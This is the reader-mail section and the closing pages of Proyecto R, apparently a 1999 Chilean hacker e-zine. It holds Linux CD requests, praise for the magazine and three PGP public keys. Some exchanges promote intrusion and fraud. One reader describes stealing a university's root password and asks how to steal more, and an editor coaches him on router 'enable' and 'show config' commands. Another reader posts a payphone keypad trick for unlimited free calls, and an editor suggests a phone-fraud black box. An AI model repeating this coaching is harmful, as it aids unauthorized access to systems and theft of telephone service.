Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hola, me interesa mas que la cresta esta cosa, pero el problema es que
no cacho mucho, y me gustaria aprender...pero ustedes le hechan la foca
pesao a los weones onda lammers, yo cacho que todos parten por algo asi,
pero como puedo aprender...chao gracias
[TkR: Si, todos empezamos por algo, normalmente es leyendo, leyendo
leyendo...y practicando...al fin y al cabo nadie nacio aprendido...]
****************************************************************************
-----Mensaje original-----
Subject: Salu2 compadres
Date: Fri, 5 Mar 1999 16:38:22 -0300
From: Gonzalo
To: proyecto_r <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Hola proyecto_r,
Q tal?
Parece q ya les envi‚ un mail de felicitacion, pero nunca esta de
mas otro.....
Junto con desearles buena onda les qiero pedir algo de ayuda
En el regedit encontre una cadena q me llamo la atenci¢n, son una
serie de caracteres ilegibles... y creo q a lo mejor se debe a PGP
553i recien instalando y aprendiendo a usar ;-)....
Ay£deme Ud Compadre, como creo q usan PGP, quisiera saber si a Uds les
aparece algo como esto (al que aun este conW95)
HKEY_CURRENT_USER\Software\K22Pgc9TnAyyFw34OtlvCCWW
y un monton de llaves, todas ilegibles..... :-(
Bien amigos, salu2, arriba con los e-zines, estan re guenos, y me he
encontrado con gratas sorpresas al encontrar link hacia Uds desde
varios pag Under..... van viento en el poto¨¨ ...... sigan as¡
Me gustar¡a ayudarles, pero por lo limitado de mis conocimientos,por
ahora, me contentare con succionarles conoc y aprender de Uds.
Una modestita sugerencita..........
Agregar una secci¢n sobre mail anonimos, programas para eso (tipo
Private Idaho) que un que cuesta ya casi lo tengo......, algun listado
de remailers y esas cosas...... a mas de alguien le va a servir...
ejemmmm ;-))
ya, quitenle el teclao a ese eon
chavela
Salu2,
Gonzalo
mailto:loncoche@xxxxx
[TkR: Pues no, a mi no me aparece y tengo la misma version de PGP, asi
que debe ser alguna otra cosa, si alguien sabe, que lo diga...]
****************************************************************************
-----Mensaje original-----
Subject: Mirror de e-zine
Date: Sat, 06 Mar 1999 05:04:12 +0100
From: "Sofia Kamarazov" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Organization: Persas S.A.
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Estimados señores:
Con la finalidad de difundir los contenidos existentes en su
e-zine, solicito a Uds. su autorización para crear un
depósito o mirror de todos los números de sus revistas;
estas se ubicarían en:
http://www.rhd.cl/e-zines/
Sin otro particular, se despide de Uds.
Alexis Dinamarca
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
==================================================
INQUIZIDOR
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
http://www.rhd.cl/e-zines/
[TkR: Pues adelante, no hay problema...siempre es bueno tener copias
de todo en otros lados, incluyendo las e-zines, las novias, etc...XDDD]
****************************************************************************
-----Mensaje original-----
Subject: Una Gran Casa
Date: Sun, 07 Mar 1999 16:55:46 PST
From: "No Tengo "
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hola a todos los de proyecto r:
Les propogo crear un dominio chileno como hack.cl
o algo asi ,para reunir a todo lo que con h/p/v/c tenga que ver onda
ccc.de claro que hay que pagar los aranceles y ahi hay un problema...
pero eso seria lo de menos(jeje) si lo pagan ustedes ...no solo bromeaba
;) me refiero que eso ayudaria bastante a lo que es el hacking en Chile.
Ah la declaración que hay en su sitio acerca de lo que son es un poco
masoquista ,pero eso no es problema mio...
Sin nada mas que plantear ,se despide un fiel lector.
SaCro(uno de todos los nombres que uso).
[TkR: Pues a ver, la idea de poner un dominio ya esta pensada, ahora se
esta cuadrando el servidor donde podamos alojar los archivos y todas las
vainas que tienen que ir, luego cuando eso este listo si nos vamos a
registrar el dominio.
Y lo de masoquistas, eso si no te lo entiendo...nos consideras
masoquistas por decir que apenas somos unos novatos en esto...???, te
pareceria mejor que andaramos diciendo que somos los superhackers y
que nadie sabe mas que nosotros...???, yo creo que no, porque en primer
lugar no es cierto...y si lo fuera no seria muy decente andar diciendolo
eso se lo dejamos a otros... ;)]
****************************************************************************
-----Mensaje original-----
Subject: linux
Date: Mon, 8 Mar 1999 20:41:58 -0000
From: mbmjma@xxxxx (nancy sandoval vera)
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
CC:
hola se acuerdan demi mm quisiera que si por favor me podrian mandar linux
plis porque no lo he podido conseguir ya lo ehe vuscado en revistas pero
siempre el cd sale rayao que lata ok espero que esten vien espero su
respuesta chaoooooo
[TkR: Nancy Sandoval, la de la lista de los RaRez, pues claro...como
olvidar tus preguntas...bueno, lo de Linux esta Ok, pero recuerda que
debes mandar tu datos personales...Direccion, telefono, estado civil,
que haces los viernes en la noche...etc...]
****************************************************************************
-----Mensaje original-----
Subject: HOlas
Date: Tue, 9 Mar 1999 19:37:48 -0600
From: "Feuerhake "
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Hola, soy un tipico usuario win95, bastante aburrido de
reiniciar,reconfigurar,reinstalar etc..aburrido de volver a hacer lo mismo
una y otra vez, aburrido de no entender el S.O. , en resumen.. me quiero
cambiar a unix,linux o no se qué... Lo que si se es que windows no me gusta
y tambien se que ustedes reparten unos CDs de linux (o unix?). Vivo en
xxxxxxxxxxxxxxxxxxxxx.. cuanto vale un envio del cd? (con gusto les pago el
costo de la copia, y por supuesto el envio). Creo que su idea de difundir
este S.O. es genial.. por eso ya puse un link a su pagina en la pagina de mi
colegio [soy el pdte. :-) ]
bueno.. no es muy concurrida.. pero algo ayuda o no?? je! bueno! .. de todas
maneras la quiero transformar en un lugar de interes para los alumnos.. con
cosas como pruebas "conseguidas" , trabajos de años anteriores (para
reutilización), facsimiles de la paa (si tienen alguno de años
cercanos..95-98.. me lo darian?) etc....
Bueno .. se me alarga el meil..
CHAO proyecto_r y ojala tengan exito..
[TkR: Ok, gracias por tener un Link a Nuestra pagina, si me envias la
url te lo agradeceria, pues me gusta conocer las paginas que nos apuntan
y ademas asi podemos tratar de ayudarte a conseguir lo que necesitas...
perdona la ignorancia, pero que es paa...???]
****************************************************************************
-----Mensaje original-----
De: {{{{{{aDm}}}}}}
Para:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Fecha: Martes 9 de Marzo de 1999 5:19 PM
Asunto: "LA TRIBU R"
Acabo de leer vuestra cuarta entrega y me ha gustado el proyecto ese de
reunirnos, podemos formar un grupo y
contactar entre nosotros, y por ejemplo, intentar HACKEAR entre todos
algun site, por ejemplo, de pornografia
infantil, ayudandonos entre nosotros, o intentar entrar en cualquier
sistema sin joderlo. Eso es, joder algo a los que se
lo merezcan.
Yo, soy del PAIS VASCO...no se si habreis oido hablar de el...una
comunidad autonoma que quiere la
independencia, etc..etc..pues eso, si quereis colaboracion y intentais
realizar a cabo el proiekto, contactar conmigo.
[PLX:Bueno la idea es esa , empezar a animar a la gente a
organizar grupos que compartan su pasion por este arte y de
esa forma reunirnos en una gran comunidad que abarque toda
hispanoamericas .. sobre el pais Vasco , pues claro que lo
conozco si la PlaXiuLiNa es de origen vasca .. te suena
Landaeta ... jejej Bueno una sola cosa que decir Vascos SI
ETA No ... !!sobre la pornografia infantil , pues hay que darles
duro ;) Gracias por tu apoyo ...]
****************************************************************************
-----Mensaje original-----
De:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Miercoles 10 de Marzo de 1999 10:01 PM
Asunto: grande Proyecto R
Los felicito gran pagina, gran proyecto
y para que esto siga asi muchachos
podrian actualizar los links a:
Informes comerciales de Colo Colo Gentileza de Tman
Tarjetas telefenicas Entel Gentileza de EXODUS
el primero no existe el archivo
y el segundo es un truco que hace
mucho las telefonistas de entel
lo controlaron
sigan adelante
[PLX: Pues si la verdad el articulo de Tman desaparecio junto
a mi HDD como unos 35 mails que se borraron buaa !! y el truco
de entel al parecer ya caduco !!! asi que como ya sabras el
tiempo no nos has permitido hacer todos los cambios que desamos
en la web .. gracias .. por los alagos ]
***************************************************************************
-----Mensaje original-----
De: Gonzalo
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Jueves 11 de Marzo de 1999 12:38 AM
Asunto: 1ra Huelga de Usuarios de Internet Chilenos
Hola proyecto_r,
Si no lo sabias, ahora lo sabes.....
ASOCIACION CHILENA DE USUARIOS DE INTERNET ACUI POR UN MEJOR
DESARROLLO DE INTERNET EN NUESTRO PAIS Estimados amigos internautas,
la ASOCIACION CHILENA DE USUARIOS DE INTERNET ACUI, les informa que el
día 8 de abril del presente año con la ayuda de todos ustedes,
realizaremos nuestra PRIMERA HUELGA CHILENA DE NO CONEXION A INTERNET,
para que el gobierno y la CTC, sepan que tienen que eliminar el SLM
para usar Internet y por lo tanto esperamos que las nuevas tarifas
telefonicas que empiezan a regir en mayo, contemplen la TARIFA UNICA O
PLANA PARA QUE SE PUEDA MASIFICAR INTERNET EN NUESTRO QUERIDO CHILE.
Si compadre, la 1ra huelga
www.acui.cl
Disculpen q interrumpa pero me parecio interesante.
Sigan adelante
Salu2,
Gonzalo
[PLX:Graicas Gonzalo por la info y jamas nos va a molestar un
mail ( a no ser que sea pa insultarnos jeej) , pero la verdad
mi cinsera opinion es que esta supesta huelga no va a servir de
nada ya que si comparamos a la cantidad de usuarios que hay en
Espa¤a , donde las presiones si funcionaron ... a la cantidad
de usuarios chilenos .. la verdad las perdidas seran minimas
y las telfonicas ni lo van a sentir . Pero igual nos aderimos
al paro .. aunque me cueste no estar conectado aunque sea un
dia .. baa !!! ]
****************************************************************************
-----Mensaje original-----
De: CESARMAN
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Domingo 14 de Marzo de 1999 11:27 PM
Asunto: Gracias
Me pare excelente sus propuestas y les deseo mucha suerte pues la
verdad es que estos tipos de Microsoft an hecho un gran monumento a
windows cuando este ni siquiera trabaja en perfeccion, me gustaria
mucho poder mandar al diablo windows, pero no tengo otra opcion
si me podes orientar a otro tipo de sistema operativo te agradecere
mucho tu respuesta vivo en guatemala C.A. y aqui la mayoria ya estan
hasta el gorro de estos tipos que ahora brindan grandes cenas y
discursos y regalando sus programas betas que solo son basura
que llenan tu disco duro y despues cuesta mucho quitarlos...
Grasia por su atencion
Cesarman
PD: si tenes un programa que me sirva para vajar Email de Hotmail o
similares te lo agradecere mucho..
Y portence bien y si se portan mal Cuenteme..
[PLX: la respuesta es simple .. LINUX !!! sobre el programita mm la
verda no se ..]
*************************************************************************
-----Mensaje original-----
De: iluvatar
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Martes 16 de Marzo de 1999 9:37 AM
Asunto: LINUX !!!!!
hola, soy estudiante de Ing. Cicil Electronica, y estuve leyendo su
E-zine N°4 y quisiera saber mas sobre linux, pues lo tengo inatalado en
mi computador, pero no tengo las actualizaciones para mi targeta de
video (una trident 3Dimage 9750). Ademas somos un grupo de mas o menos
10 personas (solamente compañeros mios) interesados en conseguir linux
para sus PC's, por lo podriamos pensar en algo como para distrubuirlo
entre gente interesada.
Si les interesa, devuelvanme un mail, y podriamos sacar algo en claro
para poder distribuirlo...
ATTE: Juan Pablo Cordova E.
[PLX: Bueno esa es la idea del MKLINUX TEAM .. es problema
es que aun no tenemos todo el dinero para comprar los CDS que
necesitamos pero en eso estamos .. por mientras si tienes inet en
la U te podrias bajar unas actualizaciones del Kernel en
www.raven.cl]
**************************************************************************
-----Mensaje original-----
De: AhNtRoX VaDeX
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Martes 16 de Marzo de 1999 9:11 PM
Asunto: MKLINUX TEAM
holas...
me llamos Christian y quisiera tener acceso a Linux,, tengo una
version de Linux que salio en PCmagazine,,, era el S.U.S.E.,,
recientemente adquiri otro computador y ya no lo puedo correr por
que es muy vieja la distribucion,,
Realmente no busco un regalo del CD,, he tenido muchos problemas
para conseguir una version nueva,, y bajarla desde Internet me
parece imposible,, por lo grande de estas,, les agradeceria que
pudieran mandarme una distribucion y,, si es posible un cd con
staroffice o cualquier programa que sea como office pero para linux
,, y cualquier emulador de mac o cosas,, se que esto seria como 2
cd minimo y si estan muy ocupados ,, simplementen no se molesten,,,
podrian derme una cuenta o yo viajar a santiago,, como quieran,, y
les pagare el cd copiado,, realmente no busco que me regalen el cd,,
prefiero que el regalo se lo den a una persona que realmente lo
necesite,, tengo mucho interes en Linux,, pero no he podido dar con
los contactos para adquirir linux,, y programas para este,, se que
puedo conseguirlo en Santiago a 5.000 pesos,, pero no me manejo bien
en Stgo.,, les pagaria igual a uds los 5.000,, si quieren los
depositare en una cuenta,, o lo mando por giro de correo ,, como
gusten... si tuviesen cualquier programa o set de programas para
linux ,, podrian hacerme llegar una lista??,,
espero que proyecto_r siga tomando fuerza... tengo a hartas
personas leyendola,, y tb. estan interezadas en Linux..,,
se depide
Christian..
[PLX: Bueno la idea es regalar el linux si eres de regiones solo
te pedimos pagar los gastos de envio , pero creo que seria justo
reponer el cd para que otra persona tambien tenga acceso al SO .
atento que pronto te llegaran noticias ]
**************************************************************************
-----Mensaje original-----
Fecha: Martes 16 de Marzo de 1999 9:33 PM
Hola, desde mucho tiempo que han desaparecido del mundo under de Chile
qisiera saber que ha sido de ustedes porque ya se supone que deberian
tener el nª 5 de la e-zine y en su web nose ve que este , ademas su
web hace tiempo que no la actualizan, qeu pasa? wueno no les aburro
mas uno estos dias les envio algun articulo interasante para el e-zine
y espero que no queden en el camino porque tienen una myu buena calidad
y por lo visto saben de lo que hablan.bueno no los aburro mas y
aaaaaaaanimos muchachos sigan adelante con el proyectose despide un
amoigo
Pdt.Han visto en el Irc la media cagadz qeu tienen en el canl #chile?
cada 5 minutos hay nuevo anfitrion
chaoooooooo
[PLX: Desparecidos jamas .. solo un poco ocupados .. y con muchas
ganas de crecer y trabajar en este proyecto .. ]
***********************************************************************
Estuve visitando la pagina de Proyecto R y cuando quise bajar algunos
programas que vi en ese lugar no pude. Me gustaria saber si esos
archivos se los puede bajar cualquiera o si hay que tener algun privilegio.
Espero que alguien me conteste, aunque sea para mandarme a la mierda.
Nasser Elsonbaty
[PLX: Bueno aki te respondemos y no para mandarte a la mierda jeje
la verdad es que esos archivos tuvimos que sacarlos por falta de
espacio y no los hemos traslado aun por falta de tiempo , pero ya
lo arreglaremos ... trankilo ]
************************************************************************
---Mensaje original-----
De: sadra sambra
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Viernes 19 de Marzo de 1999 7:05 AM
Asunto: Problema
Bueno!
aunque se que algunos no les importan los problemas de los demas por que
cuando ya son hackers! y uno no aun! lo consideran una mierda tratara en
pedir un apoyo en ustedes ya pienso formar junto con unos amigos un
pequeño grupo de estudiantes de ing de sistemas de
colombia-barranquilla, y deseo un poco de ayuda, estoy leyendo y
poniendo en pratica todo lo que voy viendo recien me robe las claves del
server de la U pero no hay nada bueno excepto la clave del webmaster y
del root, bueno ya soy root mi pregunta es
cuando me conecto con mi ip de empresa pirata de internet, por telnet me
sale un menu similar al pine de unix esto no me permite hacer hasta
ahora ningun comando, sera posible quitarlo o entrar de otra manera para
poder robarme unas pocas clavecitas.
OK
Gracias por todo
P.D les estare mandando pronto la url del grupo para que me den el visto
bueno
bye
[PLX: Bueno nosotros no somos hackers ni nos creemos jeje solo
nos interesa aprender junto a ustedes .. y no mandamos a nadie a
la mierda jejeje !! mira lo mas probable es que sea a un router
al cual te estes conectando ... asi que te recomiendo que hagas
la sgte prueba , server>enable le pones enable y deberia pedirte
unas claves y cambiar el promt por algo asi % si te cambia el
promt es que estas dentro del menu previligiado del sistema ..
ahora prueba con ,show config , y con todos los comandos show para
que veas las config del router]
****************************************************************************
-----Mensaje original-----
De: JUAN RODRIGO CUELLO PEREZ
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Viernes 19 de Marzo de 1999 7:13 PM
hola compadres de proyecto_r
felicitarlos seria poco , porque ami juicio son
el mayor aporte chileno que se me a cruzado por mi monitor.
vamos al grano dijo el dermatologo:tengo unas preguntitas que
hacerles......:
- cuando sale el proximo numero,de su e_zine
- tienen ustedes la direccion de raza mexicana ya que,
la url que sale en su revista "r.m." solo se puede bajar la e_zine
- tienen ustedes informacion de gente de mi region ( 4ta. ) coquimbo,que
se intereze por los campos que ustedes abarcan en su revista les rogaria
pònerme en contacto con ellos......
bueno por ultimo me despido un fiel lector rodrigo :
rygor
[PLX: Bueno la numero 5 la tienes en tus manos jejej .sobre raza
mexicana puedes contactarlos en redlatina canal #RAZA-MEXICANA
sobre gente del norte si hay varios entes de esas latitudes ..
te trataremos de poner en contacto ]
****************************************************************************
-----Mensaje original-----
De: marcelo fernando vergara rubio
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
' <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Viernes 19 de Marzo de 1999 9:01 PM
Asunto: felicitacines Y UN TRUCO
Hola soy marcelo y vivo en quillota.Recien comienzo a aprender
hacking, y me da mucho gusto que exista una pagina chilena de gran
categoria. Aqui les mando un truco para hablar gratis de algunos
telefonos publicos. Especificamente en los modelos que se encuntran
dentro de locales comerciales. Este modelo se caracteriza por estar
conectado a una linea telefonica comun, es decir, a la que todos
tenemos en la casa. Este telefono es de color celeste, sus teclas
y su fono se ubica en la parte centran de la cara posterior del
telefono, y lo mas importante es que tiene una tecla con una bandera.
ENTONCES:
levanta el fono.
teclea en este orden: 1-3-3-*-1-3-3*-R-#--*
entonces el tono del telefono cambiara y en la pantalla saldra una
señal que significa que tienes credito infinito.
ENTONCES LLAMA, LLAMA, LLAMA, Y LLAMA
[PLX:Bueno gracias por los alagos la verdad no es pa tanto jeje
y sobre el trukito vamos a probarlo junto al que nos ha mandado
Moonspell , veo que se estan poniendo las pilas con el Phreack]
**************************************************************************
-----Mensaje original-----
De: Rocket FAR
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Fecha: Lunes 22 de Marzo de 1999 12:39 AM
Asunto: LINUX
¡Hola Amigos!, engrandecedores de la patria espero no molestarlos,
ni les quitare tiempo hechandoles flores pero es que estoy necesitao de
una cuenta de internet que no salga slm ya que los maracos de entel le
han estrujao el bolsillo a mis viejos, bueno si pudieran ayudarme con
esto se los agradeceria en el alma, gracias de todas formas y otra cosa
si ya no fuera mucho el abuso me gustaria que me mandaran una copia de
linux, y si pueden, yo les mandaria un disquito virgen pa no molestar
tanto, y ademas de correr con los gastos de envio, bueno amigos si los
puedo ayudar en algo por favor pidanmelo pero si pudieran complacer mis
deseos estaria eternamente agradecido ya que las condiciones economicas
en que me encuentro no me permiten darme el lujo de conectarme muy
seguido a internet.
Bueno se despide su fiel admirador.
[PLX:Gracias heen!!! sobre los numeros 800 mm mira la verdad
han existido dichos numeros pero los ISP lo cierran rapidito
al saber que se estan aprovechando de ellos .. pero un consejo
si no me equivoco chilesat tenia un plan que llamabas por un
numero 800 o algo por el estilo a igual que ibm ... si en tu
comuna trabajan con una central analoga .. prueba con una
blackbox pues dicen pro ahi las malas lenguas que funciona como
una blue en ciertas centrales . (dicen !!! yo no lo he probado
ya que como todos saben la black funciona al reves .. o sea no
paga el que te llama por telefono .. pero ..) la conexion bajara
un poco de velocidad pero hay que probar no crees , sobre el Cd de
Linux .. pronto habran noticias ]
Creo que hasta aqui ha sido todo por ahora, a toda la gente escribio dando
sus datos para el Proyecto de distribucion de Linux, ya la tenemos en nuestra
base de datos a ver si el Bigbrother nos da una buena cantidad de pasta por
esos datos...XDDD...
Era broma...
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#######################
ø ø
ø 21.- Shutdown ø
ø ø
#######################
Y hasta aqui hemos llegado hoy, no quiero despedirme sin antes decirles que
todo esto que hacemos es gracias al apoyo de ustedes nuestros lectores,
espero que les haya gustado esta edicion de Proyecto R, y si no estuvo muy
bien que digamos pues todo fue culpa mia, pues es la primera vez que hago de
editor, y para serles franco me gusto.
Cada vez nos damos cuanta que mas y mas gente nos lee, y no solo de este lado
del mar, sabemos que hay gente de otros continentes que tambien lo hacen y
se mantienen en contacto con nosotros...
Upps, no se que mas decir, creo que voy a llorar...
CDLR
Pro-Hackers
Domain
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
~~~~~~~~~~~~~~~~~~
# #
#22.-Llaves PGP #
# #
~~~~~~~~~~~~~~~~~~
"Andyk"
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use
mQGiBDU9aLkRBADoUXcl/ik5spWNFIFOaP8O+3CGcfCC9ZROrj0VkFDAm3OqpkSa
2OhNQWeABvQCefbWrd8OnfMTO8AZRKe+9LfAit4cXLmgO2rywaxjP00kaUAdR7E+
GMxoVjqe8QxsYhfkV7Ea1UyPdkKR8l3X16djQF+AmdcnBEbIrmCubXfcYQCg/4AX
UPKGB4F7ukNSWD5zYjopwOUEAM613o4STs8H3nBo24VmRkyzOTWinr+5qqGL8Zjt
IlBjzVdMVk8mqP0Shly7tfhaSJioyoYJ6XCM1VJISgFnYRGbufEymsPwZeOBekjO
w7eec3m3evvH8avOm8rzKCejrlNxpuR9u+0oB9K3IbQ4eeBfl+1TBcZdomgBN26O
InLUA/901qYlUv+vNhvhCcsuYEKjpDTB22E4lELOfVOMDMgSNJfffNOe4i6P2k5C
5otHMDd54eKNKIdkcAD5i3gS7MpAOvzyZPyTc5HxAp6BJ4AS0Bd3gYrR0Vw3PlhB
oYnx884fhI7+6i1rMkVLo5HDj+HS54mHgGhxmd9Z4ZXgwBWIirQdYW5keWsgPGFu
ZHlraGFja0Bob3RtYWlsLmNvbT6JAEsEEBECAAsFAjU9aLkECwMCAQAKCRAr1PJm
+IR2IqvkAJsEibSuMHHJGggSEoHodhPT5XHI9gCgimehq0XEh7Bl2wBkmTFyxDI1
aP65AQ0ENT1owRAEAPqZDQ2eNtWYgXMWbf9rnMIOWeKlYbrlzoKsWRYPIroWmuLg
d/LmOn8Nv/AeX0wv1BHM6gpXzGzbrRPMmXseENJVVH/4QKEHVRJuTP5dyPk9hPsL
NWEP8dUdRgTQ26Q6jrQ6xHI5kc6nv0Ts9CqKLmJLGxN/YM/q1WAhE1LNbzHDAAIC
BADv904kLc2lkz0MTich/gPwZ5hjhfb+nnIhx54FybDgE2JiaLfz+cmVyYp5lr48
0Aivnaqu7epgugJW/d9fE3qQpQlJU0Q/iu96tLcxCFT6dN1iN3er6nigN1V+EAss
ieExncgISiMYCisVtj9Tl2aMQJtfMrL52ulwg4ixURJxfIkARgQYEQIABgUCNT1o
wQAKCRAr1PJm+IR2IkqMAJsHpv3nsHS3mFhzgbDhjKoIcqV8xgCgqpLdN5zv4YK1
Ykziq7a1AaGPJkk=
=thoZ
-----END PGP PUBLIC KEY BLOCK-----
"TAkER"
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use
mQGiBDaX71wRBADvJcYNJMOkxlmi3cMjvs79oX5GjcxQBtscR94prEi9duSz6uoB
BuXP5UKWMKSjSk2jjK05erS/uTkbOMvvRtbrMPtyltu8WaC2E0NLhP7D7J3Ory9Y
1l6eokAlhSQH61e3s/ZO++NG0si/Q/u6tyeIwFjznleTyY5R3rZ/RXZYWwCg/1iy
syOxySQfKOJCi8AfiCB0A4UD/iEjuwsZWEq3ay0gAlyApa6ON1bKJYaxnETjKzNt
eTTukAJeuHw1o7K3W0WrZ/4jhibFxeyvfUq3A878AVQPvZxPw9TJBxaW1iRa1cLt
QXy3IOucWZfKjCD9ASY80SZHJfqZUgFBMvv0PYZUHV6SUK6vofxUQTfWtuzgR/wl
39UqBAC7F7YjAdtMVa95CfA05kWQTs1I2OPNuOJgjmMAHUnvKh5+u4B9TnGiGfpI
jetzO6Dvd53zbvG4IAlD5/6RR786wd446QfQvSHI+zFHuJJrJ3Ved0uIgh2Fi9xD
36acI1lpgKwd+eyUJkkjwwPLPY/zilIp6SIwwhdHJIqKP0X46rQbVEFrRVIgPHVf
dGFrZXJAYmlnZm9vdC5jb20+iQBLBBARAgALBQI2l+9cBAsDAgEACgkQBW6I33hF
yJvTigCg0fWA+krEIOSIt0Yc9+Iw8e/Sog8AoODD5s/uf436TUI+Tzvhb88liiRp
uQINBDaX71wQCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoBp1ajFOmP
QFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnhV5JZzf24
rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9GAFgr5fSI/VhO
SdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67VYy4XTjTNP18
F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsC
RtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICCADT52ee1anrmJwApdetF0bh
86CxDRPlFyPLuizgrK0vAzfmiHEfyjyoaAqzK9k50+duy+Bo4WAifXFjvWYOWXS1
Kcde1ijCYal+6wW1exQ4B2ZKIDbHZIUqUtVbbCh9R9fKpzAhI700a5yks8STIQmh
wpsq036ggD7jHpCv22UkkD3yylI4yxmGG/p3fcM94GkYbI+kZryDeMdBYXXH8Y3K
pBq9f9w+IzMpT+aOQqrJqIH3Jq8nvdsOPZIEUQ3rTSdME2C6t3yjvvW7zJUrea7M
ASIHg0Rg/3kc2w1WkQQiNN+HtwPfNZl4SHAobuY5y9uns7YVvf49I9JwPsCKk3Zk
iQBGBBgRAgAGBQI2l+9cAAoJEAVuiN94RcibO3YAoO/2Yk7eUz6uXjdyb83yqjo1
opzOAJ93XUIQrU2Yz29L6ocZRpmyrb4dRQ==
=tZqO
-----END PGP PUBLIC KEY BLOCK-----
"PlaXiuS"
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use
mQENAzXQft8AAAEIAMEHngCERPQxki4D8A41ywn2NiUVkpOVF/LTQ5wOLBMm/2Xs
RYEtFXvOpwyL+JYunY6QIcSmCGgAsrDZBV2pBFdzVENzMeiKhfIBWhBB9H9Q+Tkw
7ps88fenespdw1QEVFxXkRtGnqNTOZAK7o987BRCiCSGDDZ9Plrg48tO8jM3R/tG
4LEKgXqqWJnvqY22iYgwZpMSBt7JhRZ3eUxKSeTEInOr8BtIljbRRArHETqGOAjy
dTkZUEPbEw+On2OPDcQm25WHq8/WjMAcPL+k28m4KsbY7b9GywcfwWH6PhjcgDvF
UvGi+auahjept9aFtn/fEqU6yLtoxPsnRpY3lOEABRG0HVBsYVhpdVMgPHBsYXhp
dXNAYmlnZm9vdC5jb20+iQEVAwUQNdB+38T7J0aWN5ThAQH1SQf/bvltiOQprsq1
LwqRUt3lkuZaDHNKfjYz8mJpv5dPzJ+X4uI9cKauC2L8WFYGeb+KVI6nfb+VRr+T
coG8CKCaGIEaYISoatetDN2IjvgUrXc7FxzlUXotMC+MZLZOWxnd3+J78dO/T0zC
OgteCdi5nZYfIJJooUObQ01PcgEG7hmyjGUGCtBIoyzbXdJAJN7jzBZYviq5MATB
oOZSI4W433kw6wwZcvaLsDZVo6frhsqllYEwhK4lTrxyeC0f+fk25hT63d2YLprr
u4LFsTtvpze7K/856UifF1Er4WBRtQ+ZEAsqKQXPD64gtaF82IJ9FFLLJBIPpoeU
OfrQ87c5Ow==
=bweu
-----END PGP PUBLIC KEY BLOCK-----
|
E-Zines 
